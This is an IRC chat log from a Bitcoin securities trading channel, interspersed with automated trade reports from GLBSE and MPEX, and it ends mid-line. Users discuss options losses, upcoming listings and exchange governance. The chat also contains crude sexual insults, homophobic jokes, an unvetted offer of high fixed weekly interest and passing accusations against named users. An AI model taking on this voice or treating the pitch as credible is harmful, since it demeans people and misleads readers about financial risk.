[FPGAMINING] 2 @ 0.5979 = 1.1958 BTC [-] Sep 18 18:19:16 [GLBSE] [MOVETO.FUND] 3 @ 1.0501 = 3.1503 BTC [-] Sep 18 18:21:12 [GLBSE] [PUREMINING] 3 @ 0.09685 = 0.2906 BTC [+] Sep 18 18:21:13 [GLBSE] [PUREMINING] 5 @ 0.09685 = 0.4843 BTC [+] Sep 18 18:24:09 [GLBSE] [HYDRO.BONDS] 2 @ 1.37457 = 2.7491 BTC [+] Sep 18 18:26:24 [GLBSE] [CIUCIU.MINING] 4 @ 0.101 = 0.404 BTC [+] Sep 18 18:27:48 I gotta listen to more of that guy, so entertaining. Sep 18 18:28:26 [GLBSE] [YABMC] 5 @ 0.09999999 = 0.5 BTC [+] Sep 18 18:29:04 [GLBSE] [YABMC] 1 @ 0.09999999 BTC [+] Sep 18 18:30:16 [GLBSE] [OBSI.HRPT] 50 @ 0.103 = 5.15 BTC [+] Sep 18 18:30:53 Alex's voice disturbs me. Sep 18 18:31:13 What's his deal? Ultra right wing? Sep 18 18:31:59 [MPEX] [F.GIGA.ETF] 359 @ 0.00028586 = 0.1026 BTC [-] Sep 18 18:32:01 [MPEX] [F.GIGA.ETF] 5700 @ 0.00028528 = 1.6261 BTC [-] Sep 18 18:32:02 [MPEX] [F.GIGA.ETF] 11141 @ 0.000285 = 3.1752 BTC [-] Sep 18 18:32:25 ;;later tell BTC-Mining i have some news on our transaction, msg me when awake Sep 18 18:32:26 The operation succeeded. Sep 18 18:32:30 Beauty, just what I wanted to know. Sep 18 18:33:20 lol Sep 18 18:33:29 mpoe lost 4500 coins last month Sep 18 18:33:43 from their options trading Sep 18 18:34:20 that is not sustainable Sep 18 18:34:36 nefario: who suggested it needed to be sustained? Sep 18 18:34:51 what are you getting at? Sep 18 18:35:40 writing options is a "long tail" kind of business. Sep 18 18:35:59 you accept the risk of occasional big losses in exchange for fairly consistent small gains most of the time Sep 18 18:35:59 [GLBSE] [COGNITIVE] 3 @ 0.6199 = 1.8597 BTC [+] Sep 18 18:36:18 some people call that short volatility, although that can mean other things too Sep 18 18:36:44 my point is that there's no reason to believe it's going to be a common occurrence, and thus talking about it being "sustainable" is irrelevant Sep 18 18:36:47 That had to have last months volatility from Pirate Sep 18 18:36:55 "She is CIA after all, which means banker, banker-occupier" WTF Alex Jones? lol Sep 18 18:36:59 it's like saying the credit crisis of 2008 is not sustainable Sep 18 18:37:02 When the price when from 15-7.90 I think Sep 18 18:37:16 no shit it isn't sustainable Sep 18 18:37:16 Gees not awake, typing even worse than normal. Sep 18 18:37:21 lukily, things like that don't happen often Sep 18 18:38:29 [GLBSE] [OBSI.HRPT] 1 @ 0.103 BTC [+] Sep 18 18:38:41 [GLBSE] [GIGAMINING] 1 @ 0.6189 BTC [+] Sep 18 18:38:47 it's a big risk to mpex though Sep 18 18:38:53 [GLBSE] [ASICMINER] 13 @ 0.11867999 = 1.5428 BTC [+] Sep 18 18:39:01 them being on the other side of those options that are going south for them Sep 18 18:39:27 I sort of doubt they're really considered the same entity, and I get the impression mpex doesn't take much money to keep running :) Sep 18 18:39:36 suppose Sep 18 18:39:46 this channel used to be love Sep 18 18:39:48 talking out of my ass here Sep 18 18:39:58 now its all bickering and bad feelings Sep 18 18:40:03 rg: YOU SCAMM0R Sep 18 18:40:06 you guys are harshing my buzz Sep 18 18:40:15 rg: WHY ARE YOU SUCH AN ASSHOLE Sep 18 18:40:45 ooh yeah, that's the stuff Sep 18 18:41:07 got some nice assets coming to GLBSE this weekend Sep 18 18:41:16 reeeeeel nice Sep 18 18:41:21 heh heh heh Sep 18 18:41:32 [GLBSE] [NYAN.B] 1 @ 0.99999997 BTC [+] Sep 18 18:41:33 advice on making that sound more creepy Sep 18 18:41:45 Hahah xD Sep 18 18:41:49 what kind of assets ^^ Sep 18 18:42:12 [GLBSE] [KRAKEN] 49 @ 0.00999996 = 0.49 BTC [+] Sep 18 18:42:23 Btw I like the new changes to the GLBSE Fees :) encourages more serious applications. Sep 18 18:42:29 yeah Sep 18 18:42:38 so sick of people submitting trash Sep 18 18:42:47 and then spending a month trying to send us updates Sep 18 18:42:53 and then trying to get a refund Sep 18 18:43:15 so what kind of assets Sep 18 18:43:22 some very tradeable and stable ones Sep 18 18:43:37 actually we're plugging into an already existing market/ecosystem Sep 18 18:44:17 silk road is getting listed? Sep 18 18:44:33 free drugs for everyone! Sep 18 18:44:54 Okay great :), Hopefully that will help pulling GLBSE out of the current recession from all off these defaults :( Sep 18 18:45:13 yeah this is just the tip of the iceberg Sep 18 18:45:19 because of the conference Sep 18 18:45:30 we're getting several absolutely awesome assets Sep 18 18:45:52 That's great :) Sep 18 18:46:12 they should be really stable as well Sep 18 18:46:25 several funds Sep 18 18:46:30 eh some of them gold backed Sep 18 18:46:37 some currencies Sep 18 18:46:41 etc. Sep 18 18:46:59 Okay that's great :D Then I can extend my assets into more stable stuff :) Sep 18 18:47:15 yes Sep 18 18:47:22 I will probably IPO GBF soon as well, when ever I get enough time to write up the things I need to do. Sep 18 18:47:44 GBF? Gay Boy Friend? I'm not sure we can allow that Sep 18 18:49:36 No Gays on GLBSE :o blaspheme Sep 18 18:50:25 you like to wear de ledderhossen? Sep 18 18:50:31 What's peoples opinion on Pirateat40s statement? Sep 18 18:50:35 hahahah xD Sep 18 18:50:50 I am Sweden not German :P I have hot blonds not ledderhossen Sep 18 18:51:04 I agree, I think he's trying to buy time and avoid getting sued. Sep 18 18:51:20 from* Sep 18 18:51:35 Gay Lesbian Bi Sex Exchange Sep 18 18:51:37 GLBSE Sep 18 18:52:38 Hahah xD Sep 18 18:52:47 [GLBSE] [GIGAMINING] 7 @ 0.615 = 4.305 BTC [-] Sep 18 18:53:56 It was nice to see BFLs at the conference, I missed the speech they had during the Friday was it good? Sep 18 18:56:19 didn't really get to see any talks Sep 18 18:56:30 spent time organising and chatting inbetween chaos Sep 18 18:58:03 Yea, the downside of organising it is you don't have time to enjoy it. Sep 18 18:58:22 The chaos was not noted by the people at the conference :) so that's good I guess Sep 18 18:58:32 lol Sep 18 18:58:39 well Sep 18 18:58:46 chaos was compartmentalised Sep 18 18:59:38 haha yea :P The only thing I heard is that it was slightly chaotic the first day but as I arrived Saturday morning I wasn't there to see it xD Sep 18 18:59:45 so uhm... LGBTTQQAAA stocks, bonds, and securities. neat. Sep 18 19:00:31 LGBTTQQAAA ? Sep 18 19:00:42 [11:51:36] Gay Lesbian Bi Sex Exchange Sep 18 19:00:42 [11:51:38] GLBSE Sep 18 19:00:52 like that, except the extra-long one Sep 18 19:01:01 [MPEX] [S.MPOE] 4227 @ 0.00041487 = 1.7537 BTC [-] Sep 18 19:01:31 lesbian gay bisexual transsexual transgender queer questioning advocates allies & accepting Sep 18 19:02:02 lol xD Sep 18 19:03:12 experts sexchange? Sep 18 19:03:22 heh Sep 18 19:03:58 penisland.com Sep 18 19:04:01 [GLBSE] [BIF.1YR.LOAN] 1 @ 0.875 BTC [-] Sep 18 19:05:10 [GLBSE] [BIF.1YR.LOAN] 5 @ 0.83 = 4.15 BTC [-] Sep 18 19:05:41 [GLBSE] [BIF.1YR.LOAN] 2 @ 0.8 = 1.6 BTC [-] Sep 18 19:05:48 XKCD on the subject of GLBSE: http://xkcd.com/1101/ Sep 18 19:06:08 if the "s" is for sex, there's just gonna be some sort of awkwardness Sep 18 19:06:50 oh wow, now I feel silly for having stock in NASTY (ticker) Sep 18 19:07:01 you should Sep 18 19:08:05 [GLBSE] [OBSI.HRPT] 7 @ 0.10100001 = 0.707 BTC [-] Sep 18 19:08:06 [GLBSE] [OBSI.HRPT] 1000 @ 0.101 = 101 BTC [-] Sep 18 19:08:08 [GLBSE] [OBSI.HRPT] 99 @ 0.10011 = 9.9109 BTC [-] Sep 18 19:08:09 [GLBSE] [OBSI.HRPT] 6 @ 0.1001 = 0.6006 BTC [-] Sep 18 19:08:10 [GLBSE] [OBSI.HRPT] 50 @ 0.1 = 5 BTC [-] Sep 18 19:08:11 [GLBSE] [OBSI.HRPT] 3 @ 0.1 = 0.3 BTC [-] Sep 18 19:08:13 [GLBSE] [OBSI.HRPT] 435 @ 0.1 = 43.5 BTC [-] Sep 18 19:11:13 [GLBSE] [OBSI.HRPT] 5 @ 0.10289999 = 0.5145 BTC [+] Sep 18 19:15:52 ping Sep 18 19:16:08 pong Sep 18 19:16:08 Destination Unreachable Sep 18 19:17:38 blong? Sep 18 19:17:43 plong Sep 18 19:17:52 lol Sep 18 19:17:56 went quiet Sep 18 19:18:03 was wondering if still connected Sep 18 19:18:08 hahaha xD Sep 18 19:19:06 nefario: I sent 2 emails to glbse support, whats the lead time on a response? Sep 18 19:19:10 One has been ignored for days :x Sep 18 19:21:41 [GLBSE] [GIGAMINING] 2 @ 0.59000001 = 1.18 BTC [-] Sep 18 19:21:43 [GLBSE] [GIGAMINING] 5 @ 0.59 = 2.95 BTC [-] Sep 18 19:22:00 [GLBSE] [GIGAMINING] 2 @ 0.59 = 1.18 BTC [-] Sep 18 19:23:50 [GLBSE] [OBSI.HRPT] 2 @ 0.102 = 0.204 BTC [-] Sep 18 19:23:52 [GLBSE] [OBSI.HRPT] 2 @ 0.10279999 = 0.2056 BTC [+] Sep 18 19:23:53 [GLBSE] [OBSI.HRPT] 36 @ 0.1028 = 3.7008 BTC [+] Sep 18 19:24:25 [GLBSE] [OBSI.HRPT] 4 @ 0.1028 = 0.4112 BTC [+] Sep 18 19:25:45 [GLBSE] [HYDRO.BONDS] 4 @ 1.34 = 5.36 BTC [-] Sep 18 19:26:18 ;;ticker Sep 18 19:26:18 Best bid: 11.99, Best ask: 12, Bid-ask spread: 0.01000, Last trade: 11.99, 24 hour volume: 29304, 24 hour low: 11.8402, 24 hour high: 12.03999 Sep 18 19:26:31 12 today, eh? Sep 18 19:26:36 ;;bc,24hprc Sep 18 19:26:37 11.91 Sep 18 19:26:55 Luceo: nefario was at that bitcoin conference for a few days Sep 18 19:27:01 [MPEX] [F.GIGA.ETF] 4900 @ 0.000285 = 1.3965 BTC [-] Sep 18 19:27:14 He was very busy trust me :P He ran around like a mad man Sep 18 19:27:14 so everything has been in a time warp of sorts Sep 18 19:27:49 [GLBSE] [PUREMINING] 4 @ 0.09350001 = 0.374 BTC [-] Sep 18 19:27:51 [GLBSE] [PUREMINING] 6 @ 0.0935 = 0.561 BTC [-] Sep 18 19:27:52 [GLBSE] [PUREMINING] 5 @ 0.0935 = 0.4675 BTC [-] Sep 18 19:27:53 [GLBSE] [PUREMINING] 42 @ 0.093455 = 3.9251 BTC [-] Sep 18 19:27:55 [GLBSE] [PUREMINING] 9 @ 0.093355 = 0.8402 BTC [-] Sep 18 19:28:02 Diablo-D3: Oh OK, makes sense Sep 18 19:28:40 [GLBSE] [YABMC] 1 @ 0.091 BTC [-] Sep 18 19:28:42 [GLBSE] [YABMC] 5 @ 0.0905 = 0.4525 BTC [-] Sep 18 19:28:42 [GLBSE] [YABMC] 78 @ 0.0903 = 7.0434 BTC [-] Sep 18 19:29:20 fucking connection Sep 18 19:29:55 I told you not to torrent shemale porn Sep 18 19:30:14 whats special about shemail porn? Sep 18 19:30:26 [GLBSE] [GSDPT] 300 @ 0.0034 = 1.02 BTC [+] Sep 18 19:30:41 I dont know, thats more mircea's thing Sep 18 19:31:01 [GLBSE] [RAREEARTH] 130 @ 0.0096 = 1.248 BTC [+] Sep 18 19:31:21 is the .bat bot in here? :-x Sep 18 19:31:29 err .bait* Sep 18 19:31:47 [GLBSE] [RSM] 18 @ 0.3 = 5.4 BTC [+] Sep 18 19:32:02 imsaguy: how are you even able to speak Sep 18 19:32:04 [GLBSE] [CPA] 103 @ 0.05 = 5.15 BTC [+] Sep 18 19:32:19 aww, did you silence me? Sep 18 19:32:24 :( Sep 18 19:32:53 ? Sep 18 19:33:09 I mean Sep 18 19:33:13 how can you even speak Sep 18 19:33:16 [GLBSE] [OBSI.HRPT] 42 @ 0.1028 = 4.3176 BTC [+] Sep 18 19:33:21 with that much cock in your mouth Sep 18 19:33:25 :D Sep 18 19:33:45 *burn* Sep 18 19:33:59 why, who am I being accused for shilling for now? Sep 18 19:34:11 and shouldn't you be off preventing the next hack on your exchange? Sep 18 19:34:11 no one Sep 18 19:34:21 just thought I'd sling a little shit your way Sep 18 19:34:21 oh snap Sep 18 19:34:36 imsaguy: the next one? Sep 18 19:34:42 when was the last one? Sep 18 19:34:45 wait Sep 18 19:34:46 next? Sep 18 19:34:53 nefario1: HAVE YOU NOT BEEN TELLING US STUFF? Sep 18 19:34:53 yeah, running on glbse is like running on windows Sep 18 19:34:56 its just a matter of time Sep 18 19:35:18 howso? Sep 18 19:36:12 James, what did you think of my idea? good,bad, suggestions, improvments? Sep 18 19:36:14 [GLBSE] [OBSI.HRPT] 12 @ 0.1028 = 1.2336 BTC [+] Sep 18 19:36:18 imsaguy this is the love chan now... peace and happyness... something like that copumkin knows... Sep 18 19:37:05 [GLBSE] [ASICMINER] 36 @ 0.11867999 = 4.2725 BTC [+] Sep 18 19:37:06 [GLBSE] [ASICMINER] 29 @ 0.11878989 = 3.4449 BTC [+] Sep 18 19:37:28 oh, I guess he is :) Sep 18 19:37:34 Love,peace,unity SIBERIA THE PLACE TO BE! Sep 18 19:37:54 [GLBSE] [RAREEARTH] 6 @ 0.00999 = 0.0599 BTC [+] Sep 18 19:38:29 yeah we no longer say "good moring guys", its now "fuck you asshole" :) Sep 18 19:39:34 [GLBSE] [FPGAMINING] 2 @ 0.54 = 1.08 BTC [-] Sep 18 19:39:36 [GLBSE] [FPGAMINING] 7 @ 0.5356 = 3.7492 BTC [-] Sep 18 19:39:44 que? Sep 18 19:39:50 anyway off to bed, night all, i mean go to hell ass hats! Sep 18 19:41:03 GN Sep 18 19:41:24 I'm pretty certain this is hell Sep 18 19:41:30 [GLBSE] [GIGAMINING] 4 @ 0.61499999 = 2.46 BTC [+] Sep 18 19:41:31 [GLBSE] [GIGAMINING] 93 @ 0.615 = 57.195 BTC [+] Sep 18 19:41:41 [GLBSE] [HYDRO.BONDS] 3 @ 1.3105 = 3.9315 BTC [-] Sep 18 19:42:27 [GLBSE] [BBBB] 75 @ 0.0002 = 0.015 BTC [+] Sep 18 19:42:46 [GLBSE] [HYDRO.BONDS] 2 @ 1.101 = 2.202 BTC [-] Sep 18 19:48:37 [GLBSE] [YABMC] 22 @ 0.0903 = 1.9866 BTC [-] Sep 18 19:48:39 [GLBSE] [YABMC] 4 @ 0.09020001 = 0.3608 BTC [-] Sep 18 19:48:40 [GLBSE] [YABMC] 10 @ 0.0902 = 0.902 BTC [-] Sep 18 19:48:41 [GLBSE] [YABMC] 1 @ 0.090155 BTC [-] Sep 18 19:48:43 [GLBSE] [YABMC] 2 @ 0.090155 = 0.1803 BTC [-] Sep 18 19:48:44 [GLBSE] [YABMC] 3 @ 0.090155 = 0.2705 BTC [-] Sep 18 19:48:46 [GLBSE] [YABMC] 25 @ 0.09015 = 2.2538 BTC [-] Sep 18 19:48:47 [GLBSE] [YABMC] 25 @ 0.09000001 = 2.25 BTC [-] Sep 18 19:48:48 [GLBSE] [YABMC] 2 @ 0.09000001 = 0.18 BTC [-] Sep 18 19:48:49 [GLBSE] [YABMC] 34 @ 0.09 = 3.06 BTC [-] Sep 18 19:51:01 [MPEX] [O.BTCUSD.P110T] 12 @ 0.06122032 = 0.7346 BTC [-] Sep 18 19:56:48 [GLBSE] [RSM] 15 @ 0.3 = 4.5 BTC [+] Sep 18 19:58:14 [GLBSE] [NASTY] 4 @ 0.51 = 2.04 BTC [-] Sep 18 19:58:16 [GLBSE] [BAKEWELL] 100 @ 0.15 = 15 BTC [+] Sep 18 20:00:31 [MPEX] [O.BTCUSD.P120N] 3 @ 0.26082321 = 0.7825 BTC [-] Sep 18 20:01:18 [GLBSE] [BITBOND] 1 @ 0.3349 BTC [+] Sep 18 20:06:36 [GLBSE] [BMF] 10 @ 0.57 = 5.7 BTC [+] Sep 18 20:10:58 nefario1: any comment on this 'community vetting agency' attempting to step in and insert themselves into some type of power over GLBSE assets? Sep 18 20:11:13 well Sep 18 20:11:25 the idea is being spearheaded by usagi Sep 18 20:11:29 and it has some merrits Sep 18 20:11:52 making the process of approval more neutral Sep 18 20:12:09 I can see the merits... but some parts of the spear are rusty Sep 18 20:12:32 like a rusty trombone Sep 18 20:12:43 lol Sep 18 20:12:44 and who wants to get fucked by one of those Sep 18 20:13:03 ;;ud rusty trombone Sep 18 20:13:04 http://www.urbandictionary.com/define.php?term=rusty%20trombone | To get rimmed whilst recieving a hearty reach round, thus resembling a trombone player in full chorus. Sep 18 20:13:13 lol Sep 18 20:14:02 Well I hope there's someone watching the watchmen Sep 18 20:14:14 me Sep 18 20:14:15 god Sep 18 20:14:16 lol Sep 18 20:14:18 oh shit Sep 18 20:14:24 is that lightning? Sep 18 20:14:32 getting close........adfgasdfgssssteeeee5%%%%%%%%%%%%%%% Sep 18 20:15:27 [MPEX] [S.DICE] 61175 @ 0.0034 = 207.995 BTC [+] Sep 18 20:21:00 [GLBSE] [OBSI.HRPT] 10 @ 0.10120001 = 1.012 BTC [-] Sep 18 20:34:02 omg EskimoBob doesn't know what minecraft is Sep 18 20:34:16 (I haven't actually ever played it either) Sep 18 20:35:30 eh EskimoBob, dreams are often like what usagi said. Keep trying to do something you cannot achieve because of a goal that is completly disconnected with what you're doing. Sep 18 20:35:48 [GLBSE] [RSM] 3 @ 0.26000001 = 0.78 BTC [-] Sep 18 20:36:15 Like beating up boxers, because "Minecraft" Sep 18 20:37:22 So what's the thing about S.BVPS? Sep 18 20:38:01 [GLBSE] [FPGAMINING] 18 @ 0.595 = 10.71 BTC [+] Sep 18 20:40:50 what is S.BVPS? Sep 18 20:42:03 I see Sep 18 20:42:47 [GLBSE] [FPGAMINING] 2 @ 0.598 = 1.196 BTC [+] Sep 18 20:43:01 [MPEX] [F.GIGA.ETF] 5900 @ 0.000285 = 1.6815 BTC [-] Sep 18 20:43:03 [MPEX] [S.MPOE] 3186 @ 0.0004149 = 1.3219 BTC [+] Sep 18 20:46:42 [GLBSE] [FPGAMINING] 4 @ 0.598 = 2.392 BTC [+] Sep 18 20:46:44 [GLBSE] [FPGAMINING] 13 @ 0.6 = 7.8 BTC [+] Sep 18 20:48:22 [GLBSE] [FPGAMINING] 3 @ 0.619 = 1.857 BTC [+] Sep 18 20:52:43 [MPEX] [S.DICE] 4835 @ 0.0034 = 16.439 BTC [+] Sep 18 20:54:07 Well rg keeps paying dividends. I suppose you could ask him. Sep 18 20:55:14 I'm going to purchase 25k shares for the BIB.BVPS passthrough here. Sep 18 20:57:27 i know what minecraft is Sep 18 20:57:29 and how to set it up Sep 18 20:57:34 but i have *never* actually played it Sep 18 20:57:40 'played' Sep 18 20:57:44 do you 'play' minecraft? Sep 18 20:58:09 i never have. Sep 18 20:58:47 I don't, no. Sep 18 20:59:00 I'm going to buy 25k shares of BIB.BVPS Sep 18 20:59:04 is what I said =/ Sep 18 20:59:43 you still haven't splurged for a mpex reg huh. Sep 18 21:00:13 Costy and I don't really trade options. Sep 18 21:00:17 yeah Sep 18 21:00:21 for btc-minings purposes Sep 18 21:00:25 theres plenty of 'third party' offerings Sep 18 21:00:55 There's only S.DICE and S.BVPS I'm interested in Sep 18 21:01:14 S.MPOE woulda been great for me Sep 18 21:01:17 but i forgot to purchase Sep 18 21:01:22 the DAY i was going to buy Sep 18 21:01:25 it was low Sep 18 21:01:29 thn the NEXT day Sep 18 21:01:31 it hit an all time high Sep 18 21:01:41 and here i am , kicking myself in the ass, cause i never pressed 'enter' Sep 18 21:01:54 i woulda made like 30 btc Sep 18 21:02:01 potentially more Sep 18 21:03:01 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 18 21:03:05 BMF [1@1BTC] paid: 0.09499445 BTC. Last price: 0.57 BTC. Capital gain: -0.43 BTC. Total: -0.33500555 BTC. (-33.5%) Sep 18 21:03:09 you god damn high rollers Sep 18 21:03:18 i said 30 btc profit to someone earlier and htey were like 'thats small' Sep 18 21:03:18 rg i don't recall who was saying around here he made some bitcoins Sep 18 21:03:30 30 btc is nothin to spit at Sep 18 21:03:31 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 18 21:03:38 mircea_popescu: someone cashed in? Sep 18 21:03:43 good for them Sep 18 21:03:47 as in, bought low sold high Sep 18 21:03:51 MPOE just takes so many god damn shares Sep 18 21:03:54 to make a profit Sep 18 21:03:58 GIGAMINING [1@1.5BTC] paid: 0.45625096 BTC. Last price: 0.615 BTC. Capital gain: -0.885 BTC. Total: -0.42874904 BTC. (-28.6%) Sep 18 21:05:30 eh, what's a billion these days. Sep 18 21:06:00 Well it's not that high of a gain... but it's not small either Sep 18 21:06:23 I don't spit on 300 bucks Sep 18 21:06:35 More like 360 anyway. Sep 18 21:07:07 mircea_popescu: not as much as it used to be Sep 18 21:07:09 that's for fuckin sure Sep 18 21:07:34 lol right. Sep 18 21:08:46 [GLBSE] [GIPPT] 13 @ 0.469 = 6.097 BTC [+] Sep 18 21:08:47 [GLBSE] [GIPPT] 60 @ 0.475 = 28.5 BTC [+] Sep 18 21:08:48 [GLBSE] [GIPPT] 60 @ 0.5 = 30 BTC [+] Sep 18 21:13:01 [MPEX] [S.MPOE] 36980 @ 0.00041489 = 15.3426 BTC [-] Sep 18 21:13:02 [MPEX] [S.MPOE] 34227 @ 0.00041488 = 14.2001 BTC [-] Sep 18 21:13:04 [MPEX] [S.MPOE] 48611 @ 0.00041487 = 20.1672 BTC [-] Sep 18 21:13:06 [MPEX] [S.MPOE] 26801 @ 0.00041486 = 11.1187 BTC [-] Sep 18 21:13:07 [MPEX] [S.MPOE] 33154 @ 0.00041484 = 13.7536 BTC [-] Sep 18 21:13:07 [MPEX] [S.MPOE] 20227 @ 0.00041477 = 8.3896 BTC [-] Sep 18 21:23:27 [GLBSE] [GIGAMINING] 3 @ 0.6189 = 1.8567 BTC [+] Sep 18 21:33:06 [GLBSE] [GSDPT] 17 @ 0.0034 = 0.0578 BTC [+] Sep 18 21:34:42 http://www.youtube.com/watch?v=Bt9zSfinwFA Sep 18 21:34:47 lol Sep 18 21:34:53 say no to vertical videos Sep 18 21:38:32 [GLBSE] [BLUECHIP] 2 @ 0.1 = 0.2 BTC [+] Sep 18 21:41:00 [MPEX] [F.GIGA.ETF] 5751 @ 0.000285 = 1.639 BTC [-] Sep 18 21:43:00 ok so Sep 18 21:43:05 I'm going to get some dinner Sep 18 21:43:09 tell me what to eat Sep 18 21:45:02 no nothing? Sep 18 21:45:06 ok Sep 18 21:45:10 later Sep 18 21:48:15 Sushi Sep 18 21:49:02 You're too late Sep 18 21:59:58 [GLBSE] [SILVER] 1 @ 0.00999998 BTC [-] Sep 18 21:59:59 [GLBSE] [SILVER] 49 @ 0.00999999 = 0.49 BTC [+] Sep 18 22:00:01 [GLBSE] [SILVER] 50 @ 0.01 = 0.5 BTC [+] Sep 18 22:01:02 [MPEX] [O.BTCUSD.P150T] 2 @ 0.33802052 = 0.676 BTC [-] Sep 18 22:03:09 [GLBSE] [ASICMINER] 10 @ 0.1145 = 1.145 BTC [-] Sep 18 22:03:11 [GLBSE] [ASICMINER] 20 @ 0.1124534 = 2.2491 BTC [-] Sep 18 22:04:28 [GLBSE] [ASICMINER] 1 @ 0.1124534 BTC [-] Sep 18 22:07:05 [GLBSE] [MU] 10 @ 0.23 = 2.3 BTC [-] Sep 18 22:07:17 [GLBSE] [RAREEARTH] 2 @ 0.009999 = 0.02 BTC [+] Sep 18 22:07:18 [GLBSE] [RAREEARTH] 4 @ 0.00999999 = 0.04 BTC [+] Sep 18 22:07:19 [GLBSE] [RAREEARTH] 58 @ 0.01 = 0.58 BTC [+] Sep 18 22:07:27 [GLBSE] [MU] 1 @ 0.23 BTC [-] Sep 18 22:11:37 [GLBSE] [MU] 3 @ 0.23 = 0.69 BTC [-] Sep 18 22:11:47 [GLBSE] [GOLD] 413 @ 0.00999999 = 4.13 BTC [+] Sep 18 22:11:49 [GLBSE] [GOLD] 87 @ 0.01 = 0.87 BTC [+] Sep 18 22:14:03 [GLBSE] [FPGA.CONTRACT] 2 @ 0.07495 = 0.1499 BTC [+] Sep 18 22:24:41 [GLBSE] [GSDPT] 1172 @ 0.0034 = 3.9848 BTC [+] Sep 18 22:27:00 [MPEX] [F.GIGA.ETF] 16300 @ 0.000285 = 4.6455 BTC [-] Sep 18 22:28:51 [GLBSE] [GSDPT] 592 @ 0.0034 = 2.0128 BTC [+] Sep 18 22:29:20 [GLBSE] [GIPPT] 100 @ 0.45 = 45 BTC [-] Sep 18 22:33:08 [GLBSE] [GIGAMINING] 2 @ 0.6189 = 1.2378 BTC [+] Sep 18 22:34:13 [GLBSE] [FDBF] 4 @ 0.15 = 0.6 BTC [+] Sep 18 22:35:15 [GLBSE] [YARR] 46 @ 1 = 46 BTC [-] Sep 18 22:38:20 [GLBSE] [GIPPT] 4 @ 0.45 = 1.8 BTC [-] Sep 18 22:38:21 buy them GSDPT :D Sep 18 22:39:02 yes, yes, we know Sep 18 22:39:09 I already have enough tho Sep 18 22:39:31 bought 65k S.DICE shares for the backing today :) Sep 18 22:39:45 We are at 1:1 now and we have about 440,000 shares sold Sep 18 22:41:05 There's two nefario now Sep 18 22:41:17 ive been cloned Sep 18 22:41:41 Again? What happened to the last clone doing the grunt work for you? Sep 18 22:42:11 Nefario has problems with that he doesn't have enough time so he decided to get a copy of himself :P Sep 18 22:51:12 [GLBSE] [OBSI.HRPT] 10 @ 0.1025 = 1.025 BTC [+] Sep 18 22:53:00 [MPEX] [S.BVPS] 150 @ 0.0030938 = 0.4641 BTC [-] Sep 18 22:53:02 [MPEX] [S.MPOE] 3673 @ 0.00041477 = 1.5235 BTC [-] Sep 18 22:53:03 [MPEX] [S.MPOE] 38127 @ 0.00041464 = 15.809 BTC [-] Sep 18 22:58:16 [GLBSE] [YABMC] 100 @ 0.0811 = 8.11 BTC [-] Sep 18 22:58:18 [GLBSE] [YABMC] 20 @ 0.081 = 1.62 BTC [-] Sep 18 22:58:19 [GLBSE] [YABMC] 1 @ 0.0805 BTC [-] Sep 18 22:58:21 [GLBSE] [YABMC] 99 @ 0.08 = 7.92 BTC [-] Sep 18 22:59:30 [GLBSE] [FPGAMINING] 2 @ 0.5355 = 1.071 BTC [-] Sep 18 22:59:32 [GLBSE] [FPGAMINING] 4 @ 0.53500001 = 2.14 BTC [-] Sep 18 22:59:33 [GLBSE] [FPGAMINING] 2 @ 0.535 = 1.07 BTC [-] Sep 18 22:59:34 [GLBSE] [FPGAMINING] 20 @ 0.53 = 10.6 BTC [-] Sep 18 22:59:35 [GLBSE] [FPGAMINING] 1 @ 0.521 BTC [-] Sep 18 23:11:16 [GLBSE] [OBSI.HRPT] 10 @ 0.10249999 = 1.025 BTC [-] Sep 18 23:11:18 [GLBSE] [OBSI.HRPT] 30 @ 0.1025 = 3.075 BTC [+] Sep 18 23:11:55 [GLBSE] [NYAN.A] 9 @ 0.999999 = 9 BTC [+] Sep 18 23:12:05 [GLBSE] [OBSI.HRPT] 10 @ 0.1025 = 1.025 BTC [+] Sep 18 23:12:07 [GLBSE] [OBSI.HRPT] 13 @ 0.10274 = 1.3356 BTC [+] Sep 18 23:12:08 [GLBSE] [OBSI.HRPT] 5 @ 0.10275 = 0.5138 BTC [+] Sep 18 23:12:10 [GLBSE] [OBSI.HRPT] 5 @ 0.1028 = 0.514 BTC [+] Sep 18 23:13:52 [GLBSE] [OBSI.HRPT] 79 @ 0.10285 = 8.1252 BTC [+] Sep 18 23:17:24 So who's interested in 0.5% fixed weekly interest with collateral to protect against loss? Sep 18 23:18:51 http://www.theregister.co.uk/2012/09/18/romanian_cybercrooks_plead_guilty/ Sep 18 23:18:58 mircea_popescu in JAIL Sep 18 23:19:05 lol ? Sep 18 23:19:13 the jig is UP Sep 18 23:19:13 BTC-Mining maybe, pm Sep 18 23:19:19 mircea Sep 18 23:19:21 what's your name Sep 18 23:19:31 mircea popescu Sep 18 23:19:31 dont tell me its Mircea Sep 18 23:19:34 d;uh ? Sep 18 23:19:38 that's gay Sep 18 23:19:41 im gonna call you... Sep 18 23:19:51 Mark Sep 18 23:19:52 lol go ahead. Sep 18 23:19:54 a proper americna name Sep 18 23:20:36 mark hunt ? Sep 18 23:21:00 [MPEX] [F.GIGA.ETF] 6008 @ 0.000285 = 1.7123 BTC [-] Sep 18 23:21:02 [MPEX] [F.GIGA.ETF] 1492 @ 0.00028313 = 0.4224 BTC [-] Sep 18 23:23:42 fffff Sep 18 23:24:24 bet you wish you were back on your stable chinese internet Sep 18 23:25:16 lol Sep 18 23:25:34 anyone have suggestions for an android personal organiser? Sep 18 23:28:15 google calendar? Sep 18 23:28:18 I was always partial to Data's efficiency Sep 18 23:33:25 i love data Sep 18 23:33:30 and geordi Sep 18 23:33:36 but obviously jean-luc is the best of all Sep 18 23:35:24 [GLBSE] [OBSI.HRPT] 7 @ 0.10130001 = 0.7091 BTC [-] Sep 18 23:35:24 [GLBSE] [OBSI.HRPT] 5 @ 0.1013 = 0.5065 BTC [-] Sep 18 23:35:26 [GLBSE] [OBSI.HRPT] 7 @ 0.1012 = 0.7084 BTC [-] Sep 18 23:35:27 [GLBSE] [OBSI.HRPT] 99 @ 0.1011 = 10.0089 BTC [-] Sep 18 23:35:28 [GLBSE] [OBSI.HRPT] 9 @ 0.1001 = 0.9009 BTC [-] Sep 18 23:35:29 [GLBSE] [OBSI.HRPT] 55 @ 0.1 = 5.5 BTC [-] Sep 18 23:35:31 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Sep 18 23:36:09 nana that greek chick Sep 18 23:36:13 the fatass Sep 18 23:36:18 I dunno Q has dat powa Sep 18 23:36:20 [GLBSE] [PIMP] 10 @ 